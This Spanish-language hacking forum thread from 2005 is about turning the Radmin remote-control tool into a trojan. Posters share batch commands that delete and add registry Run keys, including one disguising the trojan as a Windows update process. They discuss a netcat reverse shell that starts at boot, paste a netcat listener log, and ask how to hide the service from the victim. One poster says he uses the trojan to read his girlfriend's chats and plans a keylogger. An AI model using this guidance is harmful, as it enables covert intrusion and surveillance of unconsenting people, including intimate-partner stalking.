Troyanizando Radmin 2.1 control remoto

Iniciado por octalh, 4 Febrero 2005, 11:59 AM

0 Miembros y 1 Visitante están viendo este tema.

octalh

No puse el procedimiento porque creo que es muy simple solo hay que seguir la misma logica de la forma en la que se troyanizo, creas un bat que borre todas las entradas en el registro y todos los archivos, el ipakertool, ya tiene una opcion para detener el proceso, de esa manera pones esa instruccion hasta el principio, porque si no, no vas a poder borar el radmin ya que se estaria ejecutando

bat:
CitarREG DELETE HKEY_LOCAL_MACHINE\System\RAdmin /f
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v radmin /f
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v netcat /f
del /a:s c:\windows\system32\radmin.exe
del /a:s c:\windows\system32\AdmDll.dll
del /a:s c:\windows\system32\nc.exe

recuerda antes de meter las instrucciones del bat en el ipackertool, primero indicale que finalice el proceso del radmin.

saludos....

xpinete

Gracias por la respuesta octalh, ya tengo desinstalador hecho y funcionando correctamente. Una última cosita...no probeis con la versión de Remote Administrator 2.2 porque es diferente y no funcionaría. Supongo que con algunas modificaciones valdría. Saludos. ::)

martincasalis

Soy nuevito en esto, no entiendo esta parte...... :o

ademas netcat que con el inicio del sistema nos dara una reverse shell, ya saben si tienen ip dinamica se ponen un dominio que redireccione a su ip www.no-ip.com
Que es la reverse shell? y lo de la redireccion.
Gracias a quien me pueda ayudar.....
   8)

el-brujo

busca un poco antes de preguntar.

shell reverse --> shell inversa.

En vez de tu conectarse a el, que el se conecte a ti, por eso se llama inverso (lo normal es al revés). Busca antes de preguntar y haz el favor de leer.

joss7

Esta muy bien ese programa,yo use uno y lo istale en el ciber y tengo control sobre el ciber. ;D

ANELKAOS

Tengo un serio problema, como oculto "Remote Administrator Service" del services.msc del pc al q me conecto?¿?   ??? Canta un poco para cualkiera q sepa pra q sirve  ;D  ::)

X-Failed

EN la vesion  2.2 no aparece lasopciones k tu hay en el tutorial ??????? l a verdad k se tiene k resetear o no ????y si lamakina tiene deep frezeer  k hago lekito el deep ?'?? :-\ :-\ :-\ :-\ :-\ :-\

1000101

HOLA COMPADRE... YO AUN SOY UN NOVATO :P PERO APRENDO MUY RAPIDO... SEGUI TUS INDICACIONES PASO A PASO... LLEGUE AL PUNTO DE ENTRAR EN LA SHELL... TENGO CASI TODO PERO NO PUEDO ENTRAR... ME CONECTO A LA IP QUE ME DEVUELVE (QUE EN TODO CASO POR OTRO LADO ME LA PUEDO CONSEGUIR... ES LA MISMA...) VEO SUS PROGRAMAS CARPETAS, ARCHIVOS.... TIENE EL R_SERVER ANDANDO PERO NO LOGRO CONECTARME ???

SUPONGO... MMM TENGO ESTOS PUERTOS EN UN ENREDO:
1717
1719 Y EL PUERTO QUE SALE CON LA IP ERA 1277  ???

ME SALE ASI:

C:\>nc.exe
Cmd Line: -L -p 1717 -vv
listening on [any] 1717...
conecct to [ip.atacante] from pc-xxx-xx-xxx-xxx.cm.vtr.net [ip.victima] 1277
Microft Windows todo el resto...
C:\Document and Settings\"Nombre de la cuenta"\Mis documentos\Mis archivos recibidos

LE PONGO LA IP DE LA VICTIMA Y NO PASA NA... PROBE CON TODOS LOS PUERTOS QUE MENCIONE Y NO SE QUE HACER...
PODRIAS SER TAN GENIAL DE EXPLICARME LOS PASOS QUE SON OBVIOS PARA TI... PERO INEXPLICABLES PARA MI?  ???



Yonk

Si has segudo los pasos exactamente igual que el ejemplo el puerto al que debes conectar es el 1719. Pero quizas lo que haya podido pasar es que no se haya ejecutado realmente el r_server.exe en la victima. Hay una errata en el fuchero .bat de octalh: en la ultima linea

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe

fijate donde pone wuauclt en realidad debe de poner wuaudt.

1000101

Gracias... me di cuenta pero yo pense... que de donde saco el icono para camuflarlo tenia que ponerle asi... al final entre al pc de la victima... que me fue muy util... (estoy espiando a mi polola... sus conversaciones de chat me han dicho todo....) pero ahora quiero instalarle un "key recorder" pero si se lo tiro al inicio ella lo vera... en eso estoy... TENGO UN GRAVE PROBLEMA... CUANDO PARTE SU conexión Y ESPERO LA SHELL REVERSE: -L -P 1717 -VV... NO PASA NADA... TUBE QUE DECIRLE QUE EJECUTARA EL TROYANO DE NUEVO PARA ENTRAR... ¿SI LE CAMBIO ESA NOTA ERRADA AL BAT... FUNCIONARA CADA VEZ QUE PARA EL PCSIN TENER QUE EJECUTAR EL TROYANO? 


GRACIAS POR RESPONDER... THANKS MASTERS OF COMPUTERS